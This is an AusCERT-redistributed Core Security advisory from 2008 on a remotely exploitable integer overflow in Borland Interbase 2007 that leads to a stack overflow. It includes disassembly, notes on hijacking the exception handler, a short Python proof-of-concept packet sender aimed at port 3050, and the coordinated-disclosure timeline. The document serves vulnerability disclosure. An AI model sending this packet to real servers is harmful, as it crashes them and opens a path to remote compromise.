Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2008.0522 -- [Win][Solaris] Borland Interbase 2007 Integer Overflow 22 May 2008 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Borland Interbase 2007 SP2 (8.1.0.256) and prior Publisher: Core Security Technologies Operating System: Windows Solaris Impact: Administrator Compromise Execute Arbitrary Code/Commands Access: Remote/Unauthenticated CVE Names: CVE-2008-0467 Original Bulletin: http://www.coresecurity.com/?action=item&id=2278 - --------------------------BEGIN INCLUDED TEXT-------------------- - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ~ Core Security Technologies - CoreLabs Advisory ~ http://www.coresecurity.com/corelabs/ ~ Borland Interbase 2007 Integer Overflow *Advisory Information* Title: Borland Interbase 2007 Integer Overflow Advisory ID: CORE-2008-0415 Advisory URL: http://www.coresecurity.com/?action=item&id=2278 Date published: 2008-05-20 Date of last update: 2008-05-20 Vendors contacted: Borland Release mode: Coordinated release *Vulnerability Information* Class: Integer Overflow Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: N/A CVE Name: N/A *Vulnerability Description* The Borland Interbase 2007 database server [1] is vulnerable to an integer overflow when a malformed packet is sent to the default TCP port 3050. The integer overflow can cause a stack overflow, which allows arbitrary code execution with system privileges. *Vulnerable Packages* . Borland Interbase 2007 Service Pack 2 (8.1.0.256), Solaris and Windows versions. *Non-vulnerable Packages* . None currently available (see vendor information below). *Vendor Information, Solutions and Workarounds* Verbatim from vendor: "CodeGear is aware of an InterBase security vulnerability that can expose an InterBase server (running on Microsoft Windows, Linux, Solaris and Macintosh platforms) to a possible security breach. This vulnerability is exposed via inside the firewall connections. If an open port which is connected to an InterBase server is found, and a socket connection is made to the InterBase server, invalid data can be sent to the InterBase server which can cause a buffer overflow resulting in a hang or crash of the InterBase server. How do I protect my InterBase servers from this security vulnerability? There are 2 basic steps to protect your InterBase servers from this vulnerability: 1. The Interbase.log file will give error log information about remote machines that have invalid connection attempts. You can use this information to identify such rogue applications and take corrective action. 2. InterBase versions 7.5 and later provide a facility to redefine your instance of InterBase to use a different TCP port. Use this facility when you install the product so external rogue applications cannot connect to a "known" port. Please consult your security advisors for the best way to protect your systems. We are investigating additional solutions to address this vulnerability and will notify users of any further precautions which may be taken for additional protection." *Credits* This vulnerability was discovered and researched by Damian Frizza, from CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies. Special thanks to Alfredo Ortega. An exploit for this vulnerability will be shortly available for CORE IMPACT customers. *Technical Description / Proof of Concept Code* The Borland Interbase 2007 database server is vulnerable to an integer overflow when a malformed packet is sent to the default TCP port 3050. The integer overflow causes a stack overflow, which allows arbitrary code execution with system privileges. During the research of a Firebird SQL bug reported earlier by another party [2] a triggering proof of concept was developed. According to [3], Firebird SQL started as a fork of Borland's open source release of InterBase, so the Firebird PoC was also tested on Interbase, triggering the bug described in this advisory. 1) Solaris version: This is the vulnerable code section: /----------- inet_accept_connection+0x164: srl %o5, 0x10, %o7 inet_accept_connection+0x168: ld [%l0 + 0xcc], %l1 inet_accept_connection+0x16c: sth %o7, [%l1 + 8] inet_accept_connection+0x170: ba +0x3a0 <inet_accept_connection+0x510> inet_accept_connection+0x174: ld [%fp - 0x8c], %g2 inet_accept_connection+0x178: ld [%fp - 0x88], %g3 inet_accept_connection+0x17c: add %fp, -0x84, %g2 inet_accept_connection+0x180: st %g2, [%fp - 0x90] inet_accept_connection+0x184: ldsb [%g3], %g4 inet_accept_connection+0x188: st %g4, [%fp - 0xa0] inet_accept_connection+0x18c: ld [%fp - 0x88], %o5 inet_accept_connection+0x190: add %o5, 1, %o7 inet_accept_connection+0x194: st %o7, [%fp - 0x88] inet_accept_connection+0x198: ld [%fp - 0xa0], %o4 inet_accept_connection+0x19c: st %o4, [%fp - 0x304] inet_accept_connection+0x1a0: ld [%fp - 0x304], %l0 inet_accept_connection+0x1a4: st %l0, [%fp - 0x308] inet_accept_connection+0x1a8: ld [%fp - 0x308], %l1 inet_accept_connection+0x1ac: cmp %l1, 0 inet_accept_connection+0x1b0: be,a +0x50 <inet_accept_connection+0x200> inet_accept_connection+0x1b4: clr %g2. - - -----------/ The integer overflow occurs when loading a signed byte from the packet here: /----------- inet_accept_connection+0x184: ldsb [%g3], %g4 g4 = 0xffffff80 - - -----------/ Then the value overflowing 'g4' is moved to 'l3', and used as a counter /----------- inet_accept_connection+0x1b8: ld [%fp - 0x88], %g2 inet_accept_connection+0x1bc: ld [%fp - 0x90], %g4 inet_accept_connection+0x1c0: ldsb [%g2], %g3 * inet_accept_connection+0x1c4: stb %g3, [%g4] ** inet_accept_connection+0x1c8: ld [%fp - 0xa0], %l1 inet_accept_connection+0x1cc: ld [%fp - 0x88], %o4 inet_accept_connection+0x1d0: sub %l1, 1, %l2 inet_accept_connection+0x1d4: st %l2, [%fp - 0xa0] inet_accept_connection+0x1d8: add %o4, 1, %o5 inet_accept_connection+0x1dc: st %o5, [%fp - 0x88] inet_accept_connection+0x1e0: ld [%fp - 0xa0], %l3 inet_accept_connection+0x1e4: cmp %l3, 0 *** inet_accept_connection+0x1e8: ld [%fp - 0x90], %o7 inet_accept_connection+0x1ec: add %o7, 1, %l0 inet_accept_connection+0x1f0: st %l0, [%fp - 0x90] inet_accept_connection+0x1f4: bne,a -0x38 <inet_accept_connection+0x1bc> * g3 point to packet bytes ** copy packet bytes to the stack address pointed by g4 *** loop until l3 = 0 - - -----------/ 2) Windows version: In this platform the integer overflow is produced here: /----------- 0040F605 0FBE11 MOVSX EDX,BYTE PTR DS:[ECX] - - -----------/ And here the packet data is copied from the packet to the stack: /----------- 0040F62C 880A MOV BYTE PTR DS:[EDX],CL - - -----------/ In the stack we can see a 0x40 bytes size buffer followed by a pointer to the source string: /----------- 00ECF6CC 0000000 00ECF6D0 00000000 00ECF6D4 00000000 00ECF6D8 00000000 00ECF6DC 00000000 00ECF6E0 00000000 00ECF6E4 00000000 00ECF6E8 00000000 00ECF6EC 00000000 00ECF6F0 00000000 00ECF6F4 00000000 00ECF6F8 00000000 00ECF6FC 00000000 00ECF700 00000000 00ECF704 00000000 00ECF708 00000000 00ECF70C 00A9636D * * source string pointer - - -----------/ We can write on the Structured Exception Handler taking control of the program flow if we set a pointer to our data when the loop writes the source pointer. The following Python code demonstrates the bug on the default installation. Replace the IP address '192.168.22.252' with yours. Port '3050' is the default one. /----------- # save as ibserver_poc.py and run it with Python import socket import struct socket = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) socket.connect(("192.168.22.252", 3050)) packet ='\x00\x00\x00\x01\x00\x00\x00\x13' packet +='\x00\x00\x00\x05\x00\x00\x00\x1d' packet +='\x00\x00\x00\x09' packet += 'B' * 9 packet +='\x00'*6 packet +='\x02\x00\x00' packet += '\x01\x60' packet +='\x02' packet += chr(0x80) # negative byte packet += 'A' * 1000 socket.send(packet) socket.close() - - -----------/ *Report Timeline* . 2008-05-02: Initial notification sent to the vendor, offering the CORE-2008-0415 advisory draft in plain-text or encrypted. . 2008-05-05: Vendor acknowledges and requests the draft in plain text. . 2008-05-05: Core sends the draft. . 2008-05-09: Vendor requests a more detailed description of the steps to reproduce the bug. . 2008-05-09: Core sends a more detailed description of the steps to reproduce the bug and fixes a bug on the PoC python code. . 2008-05-09: Vendor confirms the bug has been reproduced. . 2008-05-14: Vendor sends information for the advisory, including steps to protect from the vulnerability and considering the issue closed. . 2008-05-15: Core asks the vendor if the response is final and communicates that the steps described by the vendor are only ineffective mitigations that can be bypassed by a skilled attacker (i.e. finding any new port and erasing the Interbase logs). If the response is final, advisory will be published on May 26th as scheduled. . 2008-05-15: Vendor confirms that the response is final and that any further information will be notified to the customers. . 2008-05-15: Core decides and communicates the vendor that the advisory will be published on May 20th, no further postponement is required by the coordinating parties. . 2008-05-20: Advisory CORE-2008-0415 is published. *References* [1] Borland Interbase 2007 http://www.codegear.com/products/interbase [2] Firebird Username Remote Buffer Overflow Vulnerability http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0467 [3] http://en.wikipedia.org/wiki/Firebird_%28database_server%29 *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkgzPhQACgkQyNibggitWa0lnwCgiVkAf83Z7p9soVJu8Jc5cKbG kRgAoKZxEnqud2/0HMPeYdhUeGVuGQRj =Jqq2 - -----END PGP SIGNATURE----- - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: http://www.auscert.org.au/render.html?cid=1980 If you believe that your computer system has been compromised or attacked in any way, we encourage you to let us know by completing the secure National IT Incident Reporting Form at: http://www.auscert.org.au/render.html?it=3192 =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQCVAwUBSDTYOyh9+71yA2DNAQIRJQP/Zooz94NJauResSo4ABpRqFMQGEthQs7R GAYwFOxlSVBGcx9mtKkOB09gXR+/PK+jqvNTT1zmO7p9sHz0v1Tj0LhT9txNCstX 6p6lCdoaHV6m3TF4q6W+5ZN6c/2dJu/eIQYFez2cqhFW9kJUTzwog5KHdrDRnA4X hPDIMsDuipc= =24A6 -----END PGP SIGNATURE-----